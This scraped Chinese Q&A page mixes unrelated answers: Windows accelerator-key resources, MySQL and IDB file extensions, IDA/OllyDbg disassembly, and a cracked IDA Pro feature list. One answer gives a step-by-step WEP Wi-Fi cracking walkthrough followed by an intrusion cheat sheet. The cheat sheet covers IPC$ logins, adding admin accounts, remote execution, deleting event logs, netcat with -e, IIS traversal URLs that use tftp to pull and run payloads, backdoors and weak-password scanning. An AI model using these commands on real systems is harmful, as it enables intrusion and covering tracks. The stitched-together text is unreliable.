VK_F2, ID,VIRTKEY, CONTROL ;Ctrl + F1

VK_F3, ID,VIRTKEY,ALT,SHIFT ;Alt + Shift + F2

在一个资源脚本文件中,可以定义多个菜单和多个加速键表,当然也有其他各式各样的资源,有位图、图标与对话框等,这就涉及为这些资源取ID值的问题,取值的时候要掌握的原则是:

(1)对于同类别的多个资源,资源ID必须为不同的值,如定义了两个菜单,那么它们的ID就必须用不同的数值表示,否则将无法分辨。

(2)对于不同类别的资源,资源ID在数值上可以是相同的,如可以将菜单和加速键的ID都定义为1,同时也可以有ID为1的位图或图标等,Windows并不会把它们搞混。

❼ mysql .idb .frm .par是什么文件

【MySQL文件】

MySQL是一个关系型数据库管理系统,由瑞典MySQL AB 公司开发,目前属于 Oracle 旗下公司。MySQL 最流行的关系型数据库管理系统,在 WEB 应用方面MySQL是最好的 RDBMS (Relational Database Management System,关系数据库管理系统)
应用软件之一。MySQL所使用的 SQL 语言是用于访问数据库的最常用标准化语言。

MySQL文件就是SQL文件,里面就是建表语句 以.SQL为后缀。SQL脚本是包含一到多个SQL命令的SQL语句。以将这些SQL脚本放在一个文本文件中(SQL脚本文件),然后通过相关的命令执行这个SQL脚本文件。

【IDB文件】

IDB智能数据库系统(multimedia intelligent database system)是一个对象数据库管理系统。智能数据库是研究利用人的推理、想象、记忆原理,实现对数据库的存储、搜索和修改。通过有效的组织,能够满足人们快速检索和修改数据库的要求。

IDB文件是一种 MSDev 中间层文件。当IDB文件在IDA打开,数据解压到的文件的集合。后的数据库被关闭时,该文件被压缩回IDB文件。这使得更快的性能,同时在数据库打开和较低的磁盘使用时关闭。

< H1 >其他IDB格式: < /H1 >在调试过程中由一个Visual Studio程序中创建的中间文件,如Visual C, 节省了编译器的状态,并用于最小的重建计划和增量编译。

【PAR文件】

PAR文件为交换文件,主要是Windows环境下的文件名 。绝大多数DOS文件名后缀在Windows下继续有效,但Windows本身也引出了许多种崭新的后缀名,如:*.drv为设备驱动程序(Driver)、*.fon和*.fot都是字库文件、*.grp为分组文件(Group)、*.ini为初始化信息文件 (Initiation)、*.pif为DOS环境下的可执行文件在Windows下执行时所需要的文件格式、*.crd即卡片文件(Card)、*.rec即记录器宏文件(Record)、*.wri即文本文件(Write),它是字处理write.exe生成的文件、*.doc和*.rtf也是文本文件(Document),它们是Word产生的文件、*.cal为日历文件、*.clp是剪贴板中的文件格式、*.htm和
*.html即主页文件、*.par为交换文件、*.pwl为口令文件(Password)等等。

【FRM文件】

FRM文件是文本类型文件,用记事本就可以打开,而且也可以保存。

FRM文件扩展名信息:

1.表单;

2.Frame Maker或Frame Builder文档;

3.Oracle可执行表(3.0版或早期版本);

4.Visual Basic表单;

5.WordPerfect Merge表单;

6.DataCAD标志报表文件。

❽ 如何获取本机存储的无线网密码 如果回答的答案正确追加分数!!!

需要WinAircrackPack
该工具包是一个无线工具的组合包,包括WinAircrack.exe,wzcook.exe,airdecap.exe以及airomp.exe四个程序,这些程序各有各的用。
SSID号发现工具就是airomp.exe。对付 SSID影藏
第一步:解压缩下载的工具包,运行里头的airomp.exe
第二步:选择相应的网卡,输入对应无线网卡前的序号
第三步:输入o或者a选择网卡模式,
第四步:选择搜索频段,输入0是代表所有频段都检测的意思。
第五步:接下来会提示你输入一个保存文件,这样该工具会把所有sniffer下来的数据包放到这个文件中
第六步:only write wep ivs是否只检测WEP加密数据包,我们选择“Y”即可。
第七步:这时会出现一个提示,大概意思就是说目前驱动还不支持,无法进行sniffer的操作。同时浏览器会自动转到一个页面,我们可以通过这个页面下载兼容驱动程序,升级我们的无线网卡让sniffer工具——airomp.exe可以顺利运行

(2)下载无线网卡新驱动:
要想下载合适的无线网卡新驱动就需要到前面提到的那个跳转页面了。
第一步:打开的页面地址为http://www.wildpackets.com/support/proct_support/airopeek/hardware,我们通过这个地址下载适合自己网卡的可以使用airomp的驱动。
第二步:在搜索设备页面中选择自己无线网卡的品牌和型号。笔者选择tp-link的所有无线产品进行查询,看看应该下载哪个驱动
第三步:在查询结果页面中我们可以看到自己的网卡应该使用该站点提供的AR5005G驱动来使用airomp
四步:再次返回http://www.wildpackets.com/support/proct_support/airopeek/hardware页面,你会在该页内容上看到关于该驱动所兼容的atheros卡型号,里面会提到ar5005,虽然我们的是ar5005g但是可以使用。点该页面下方的the wildpackets atheros wireless driver v4.2链接进行下载即可
第五步:下载wildpackets atheros wireless driver v4.2驱动到本地硬盘。
第六步:打开后里面有三个文件,我们的无线网卡升级工作就要靠这三个文件。
(3)安装无线网卡新驱动:
之前下载的wildpackets atheros wireless driver v4.2压缩包里的三个文件就是我们安装驱动的主角。
第一步:在桌面网上邻居图标上点鼠标右键,并选择属性。
第二步:在自己的无线网卡对应的本地连接上点鼠标右键,并选择属性。
第三步:在无线网络连接属性窗口中的“常规”标签下点网卡信息旁边的“配置”按钮。
第四步:在“驱动程序”标签中点“更新驱动程序”按钮。
第五步:系统将出现硬件安装向导,我们选择“从列表或指定位置安装(高级),然后点“下一步”按钮
第六步:然后选择“不要搜索,我要自己选择要安装的驱动程序”,点“下一步”按钮继续。
七步:由于之前我们安装的驱动是*****无线网卡的官方驱动,所以系统默认会找到相应的驱动,我们不选择他们,点“从磁盘安装”。
第八步:通过“浏览”按钮找到我们下载并解压缩的wildpackets atheros wireless driver v4.2文件保存目录。
第九步:选择atheros ar5005g cardbus wireless network adapter,点“下一步”继续
第十步:在安装驱动过程中会出现兼容性提示,我们点“仍然继续”即可。
第十一步:系统复制必须文件到本地磁盘
第十二步:完成硬件更新向导,我们的TP-LINK无线网卡现在已经变成了atheros ar5005g无线网卡了,这样才能够使用airomp这个无线网络sniffer工具。
四、总 结:
由于WEP破解的准备工作比较多,已经成功的将自己的网卡进行了更新驱动工作,这也是WEP加密破解的关键,

开始 轻松破解无线网络WEP
一、使用airomp抓取无线网络数据包并破解SSID名称:
不管是找出已经禁用了SSID号广播的无线网络还是进行WEP解密工作,我们首先要做的就是通过无线网络sniffer工具——airomp来监视无线网络中的数据包。
第一步:打开文章中下载的winaircrackpack压缩包解压缩的目录。
第二步:运行airomp.exe程序,这个就是我们的sniffer小工具,他的正常运行是建立在我们无线网卡已经更新驱动的基础上。
第三步:这时你会发现显示的信息和安装驱动前已经不同了,我们的***网卡名称已经变为13 atheros ar5005g cardbus wireless network adapter,也就是说他成功更新为与atheros兼容的硬件了。我们输入其前面的数字13即可。
第四步:接下来是选择无线网卡的类型,既然说了是与atheros相兼容的,所以直接输入“a”进行选择即可。
第五步:上面文章中提到了已经把无线网络的SSID广播功能取消了,这样我们假设还不知道该无线设备使用的哪个频段和SSID号。在这里输入0,这样将检测所有频段的无线数据包。
实际上要想知道一个无线网络使用的频段是非常简单的,可以使用无线网卡管理配置工具,就像上文提到的那样,可以知道该无线网络使用的速度和频段,但是无法检测出SSID号。
第六步:同样输入一个保存数据包信息的文件,例如输入softer。这样可以把检测到的数据包以及统计信息一起写到这个文件中,并为使用其他工具提供基础保证。
第七步:是否只收集wep数据信息,我们点N”。这样将检测网络中的所有数据包不只WEP加密数据。
第八步:最后airomp会自动检测网络中的所有频段,对无线网络中的无线数据包进行统计和分析。
第九步:当统计的数据包比较多的时候,就可以自动分析出无线网络对应的SSID号和无线设备的MAC地址以及无线速度,发射频段和是否加密,采用何种方式加密了,是不是非常神气?例如设置的无线网络SSID号为softer,刚开始图7中统计时还没有检测出来,当数据达到一定数量后例如DATA处为 15651时就可以看到ESSID号即SSID号为softer了。
至此我们成功的实现了通过airomp找到没有开启SSID广播功能的无线网络对应的SSID号,所以说仅仅报着将SSID号隐藏并修改默认名字是不能阻止非法入侵者连接无线网络的。不管你是否开启SSID广播,我们都可以通过无线网络的sniffer工具来找出你的真实SSID名称。
不过有一点要特别注意,那就是是否能够破解SSID名称是建立在airomp搜集到足够的数据包基础上的,也就是说也可能你的无线路由器开着,但是没有任何无线网卡和他通讯,这样airomp是无法检测到任何无线数据包并进行分析破解的。笔者在写本文进行的实验环境也是如此,那另外一块TP-LINK无线网卡510G安装在一台联想笔记本上并不停的通过无线路由器进行BT下载来保持总是不断有无线数据传输,这样才可以加快破解进程。
另外当数据包没有收集足够多的情况下,airomp会出现错误信息,例如本来是WEP加密方式的无线网络,可能会检测为WPA。用户只需要多等些时间让airomp收集足够多的数据就可以保证显示结果的真实性了。

二、使用WinAircrack破解WEP密文:
虽然我们可以通过airomp来检测无线网络的基本信息,包括发射频段,无线网络的SSID名称,无线速度等。但是对于那些使用WEP加密了的无线网络就无能为力了,即使我们知道了无线网络的SSID号如果没有WEP加密密文的话,依然无法连接到该网络。
不过airomp收集到的信息也是非常宝贵的,我们可以通过另外一个工具来分析出WEP密文。该工具的名称是WinAircrack,当然在用 WinAircrack破解airomp收集到的信息前一定保证airomp收集的信息量要大,信息越多破解越不容易出问题,而且破解成功所需时间越短。
第一步:打开下载的压缩包,运行里面的winaircrack.exe程序。
第二步:在左边找到general,接下来点GENERAL界面中下方的click here to locate capture file...,让我们选择一个捕获文件。
第三步:这个文件就是上面所提到的airomp保存下来的数据统计文件,第九步中已经为其起了一个名字叫softer了,那么我们到airomp.exe所在文件夹中找到softer.cap文件,这个文件就是捕获文件。
第四步:回到general界面,在encryption type处选择WEP。
第五步:在左边点WEP,在WEP设置标签中先检测64位密文,key index保持自动AUTO。因为大部分用户在设置无线路由器WEP加密时都选择了最简单的64位密文,他也是破解所需时间最短的。
第六步:设置完毕点右下角的“aircrack the key...”按钮,winaircrack会自动根据softer.cap中保存的统计信息进行分析,暴力破解WEP密文。
第七步:由于采取的是暴力破解方法,所以花费的时间会比较多,大概需要几个小时甚至更多的时间来破解一个64位的WEP密文。当发现WEP密文后会显示出内容.

不过在实际操作过程中需要的时间会比较长,特别是当WEP密文设置的比较复杂时,例如使用多个数字或者增加加密位数达到128位等。
另外通过airomp来收集无线数据传输包也是关键,也许对方开着路由器但并没有和网卡进行大流量数据传输,这样即使你开启airomp收集了几个小时,都可能出现无法获得足够数据包问题。
仅仅是为了和大家交流,希望大家不要使用本文介绍的方法去入侵别人的无线网,
大家能够明白WEP加密也不是百分之百安全,所以应该尽量使用WPA安全加密方式。

--------------------------------------------------------------------------------

无线网络密码破解
面的工具可以帮助你。你有点电脑基础的话,很容易搞到密码的。

Kismet:一款超强的无线嗅探器

NetStumbler:免费的Windows 802.11嗅探器

GFI LANguard:一款Windows平台上的商业网络安全扫描器

Airsnort:802.11 WEP加密破解工具

无非是扫描 嗅探 破解

与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""

(以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"

(传送文件到远程主机WINNT目录下) 本机目录路径\程序 \\IP地址\admin$

(查看远程主机时间) net time \\IP地址

(定时启动某个程序) at \\IP地址 02:18 readme.exe

(查看共享) net view \\IP地址

(查看netbios工作组列表) nbtstat -A IP地址

(将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"

(这两条把自己增加到管理员组): net user 用户名 密码 /add

net localgroup Administrators 用户名 /add

(断开连接) net use \\IP地址\ipc$ /delete

=====================================================

擦屁屁:

del C:\winnt\system32\logfiles\*.*

del C:\winnt\system32\config\*.evt

del C:\winnt\system32\dtclog\*.*

del C:\winnt\system32\*.log

del C:\winnt\system32\*.txt

del C:\winnt\*.txt

del C:\winnt\*.log

============================

一、netsvc.exe

下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:

netsvc /list \\IP地址

netsvc schele \\IP地址 /query

netsvc \\IP地址 schele /start

二、OpenTelnet.exe

远程启动主机的Telnet服务,并绑定端口到7878,例如:

OpenTelnet \\IP地址 用户名 密码 1 7878

然后就可以telnet到主机的7878端口,进入DOS方式下:

telnet IP地址 7878

三、winshell.exe

一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:

p Path (查看winshell主程序的路径信息)

b reBoot (重新启动机器)

d shutDown (关闭机器)

s Shell (执行后你就会看到可爱的“C:\>”)

x eXit (退出本次登录会话,此命令并不终止winshell的运行)

CMD> http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)

四、3389登陆器,GUI方式登录远程主机的

五、elsave.exe

事件日志清除工具

elsave -s \\IP地址 -l "application" -C

elsave -s \\IP地址 -l "system" -C

elsave -s \\IP地址 -l "security" -C

执行后成功清除应用程序日志,系统日志,安全日志

六、hbulot.exe

开启win2kserver和winxp的3389服务

hbulot [/r]

使用/r表示安装完成后自动重起目标使设置生效。

七、nc.exe(netcat.exe)

一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。

想要连接到某处: nc [-options] hostname port[s] [ports] ...

绑定端口等待连接: nc -l -p port [-options] [hostname] [port]

参数:

-e prog 程序重定向,一旦连接,就执行 [危险!!]

-g gateway source-routing hop point[s], up to 8

-G num source-routing pointer: 4, 8, 12, ...

-h 帮助信息

-i secs 延时的间隔

-l 监听模式,用于入站连接

-n 指定数字的IP地址,不能用hostname

-o file 记录16进制的传输

-p port 本地端口号

-r 任意指定本地及远程端口

-s addr 本地源地址

-u UDP模式

-v 详细输出——用两个-v可得到更详细的内容

-w secs timeout的时间

-z 将输入输出关掉——用于扫描时

八、TFTPD32.EXE

把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:

http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名

然后可以直接令文件运行:

http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名

九、 prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用 telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp 下需要打winxp。

一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。

一、一 Xscan命令行运行参数说明:

在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按""强行关闭程序。

1.命令格式: xscan -host [-] [其他选项]

xscan -file [其他选项]

其中 含义如下:

-port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);

-ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);

-ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);

-cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);

-iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);

[其他选项] 含义如下:

-v: 显示详细扫描进度

-p: 跳过Ping不通的主机

-o: 跳过没有检测到开放端口的主机

-t : 指定最大并发线程数量和并发主机数量, 默认数量为100,10

采纳我吧 谢谢

❾ ida 分析 32位程序 需要使用32位 ida吗

DLL 属于可执行文件中的一类,又称为动态链接库,不能直接用DEBUG加载,一般由应用程序因使用该库中的函数,而由操作系统在应用程序加载的同时被加载入特定地址,这个地址一般是DLL在链接时指定的。当DLL被加载到运行空间,根据输出函数表,可以得到各个函数的入口地址,然后用DEBUG在各个入口下断点,调用该函数时DEBUG将跟踪进入该函数,从而实现反汇编。
反汇编属于逆向工程,逆向工程的主要手段有两大类,其中一类是动态分析,另一类是静态分析。
前面提到的方法属于动态分析,由DEBUG实现反汇编,该方法不容易得到完整的代码,一般只能形成一段一段独立分散的代码,同时由于DEBUG的局限性,反汇编的代码质量多不高,生成的代码不能直接使用,原因在于DLL在加载时若没有加载到指定地址空间,操作系统将对代码进行重定向,所以DEBUG只能得到重定向后的代码,这类代码必须修改每一个重定向点,才能形成可执行代码。作为WINDOWS32位操作系统, OLLYDBG是最为优秀的调试、跟踪、反汇编工具,多窗口运行,可以方便的通过窗口操作完成各类动作,而不需要像一般DEBUG那样由命令行来完成,OLLYDBG还有许多一般调试器不具备的功能,同时由于每一代高手不断的修改,使其具有多种功能,同时带来的就是混乱,谁也不知道有多少版本,谁也不清楚每个版本到底增加了什么功能,但就这样,也是瑕不掩疵, OLLYDBG任然是DEBUG中最强大,最好使用的。
静态分析和动态分析不同,静态分析直接打开原程序,加载而不运行,然后直接分析加载的代码。目前静态分析工具,最强大的当属IDA,IDA支持几乎所有种类的汇编语言。
IDA加载应用程序有许多选项,可以选择完整的加载整个程序,也可以选择加载程序的某个块,一般可选择的是否加载文件头、资源表、输入表、输出表等等。
IDA还支持调试,也就是说,当你在进行反汇编过程时,可以直接使用IDA来调试跟踪,以分析代码的动态执行情况,不过就动态跟踪来说,OLLYDBG更为强大。
IDA反汇编的正确率和代码的复杂程度有关,对于正规开发的代码,尤其是如果能够获得源程序的调试文件,即所谓的PDB文件,IDA可以读取PDB文件中的信息,使得反汇编的效率和准确度大为提高,生成的代码甚至比源代码易读。IDA将反汇编生成的结果存入IDB文件中。当你确认反汇编的结果达到你的要求,可以让IDA输出汇编源代码,IDA也提供其他格式的输出,例如HTML文件,便于用户阅读。楼主主要是用于分析DLL文件,一般来说这类文件更适合做静态分析,所以推荐使用IDA来进行。
IDA对于分析那些加壳或含有大量花指令、混淆代码、垃圾代码的程序,反汇编的正确率会大为下降,因为IDA无法正确的确认当期位置上的数值是属于代码,还是属于数据,是普通C字符,还是DELPHI的字符串,还是UNICODE字符串,是结构数据还是数组还是类表(DELPHI生成的代码中含有大量的类表)等等。遇到这种情况,就需要使用者掌握许多技巧,例如可以通过使用者对当前数据的认识,指导IDA如何处理当前的数据。对于大批量的,具有某些规律的数据,IDA还提供了脚本语言(文件尾位idc),通过对脚本的执行来指导IDA如何进行反汇编。对于更为复杂的情况,例如程序是自解压运行的,这时IDA就没有任何能力来进行正确的分析,通常都会用OLLYDBG动态跟踪,等程序完成自解压后从内存中将解压后的代码完整的挖下来形成文件,再由IDA进行静态分析。
对于成功进行反汇编的代码,IDA根据代码的入口、调用、转移等指令,可以为使用者提供各种格式的程序的流程图,IDA提供许多格式由用户选择,便于用户理解程序的结构。

汇编语言的科学定义,其实就是介于机器码(各种01)和高级语言(如C)之间的一种语言。你用C语言写一段程序,其实要在机器上运行的话,机器是不懂的,要经过编译器、汇编器编译,变成汇编,最终再变成机器码,机器根据这些机器码的01可以控制硬件电路完成你程序想执行的操作。

❿ ida pro 6.4怎样汉化

可保存结果的最终版来了
1 解除时间限制
2 解除每30分钟跳出提示的限制
3 解除复制粘贴的限制
4 解除批处理限制。。。
5 增加插件支持和F5功能
6 增加保存idc功能Shift+s (实现保存分析可以根据时间保存多个快照)
7 增加各种加密狗的sig
8 增加各种iphone系统库的sig识别
9 增加ida直接修改文件功能插件
10增加调试器隐藏反反调试插件
11增加算法识别插件
12增加ida_sync同步分析插件
13增加arm code 插件快捷键I K键
14增加2进制数据复制粘贴插件
15增加资源导出插件
16增加UniCodeString和Unicode Convert插件来增强字符解析
测试环境winxp正常 win7x64会有一些功能不正常比方close功能
关于保存功能:
我写了个插件保存用shift+s把当前数据库保存成idc档!这个功能类似于快照功能!下次用的时候先反

编译程序完成后再用load脚本功能把你保存的idc脚本载入!分析的注释啥的就都恢复了

阅读全文

与ida脚本命令报错相关的资料

热点内容
在位编辑命令 浏览:347
曲式分析基础教程pdf 浏览:14
php生成静态html页面 浏览:964
怎么分割pdf 浏览:812
压缩垃圾报警器 浏览:628
小公司一般都用什么服务器 浏览:967
java获取时间gmt时间 浏览:819
为什么csgo一直连接不到服务器 浏览:503
安卓登ins需要什么 浏览:835
机器人算法的难点 浏览:225
全自动化编程 浏览:726
程序员高薪限制 浏览:693
压缩图片压缩 浏览:75
美国发明解压魔方 浏览:302
电脑怎么备案网上服务器 浏览:515
旅行商问题Python写法 浏览:952
解压破坏王里面的所有兑换码 浏览:860
文件夹如何拖拽还保留原来的 浏览:22
职业生涯pdf 浏览:954
ubuntu安装软件php 浏览:160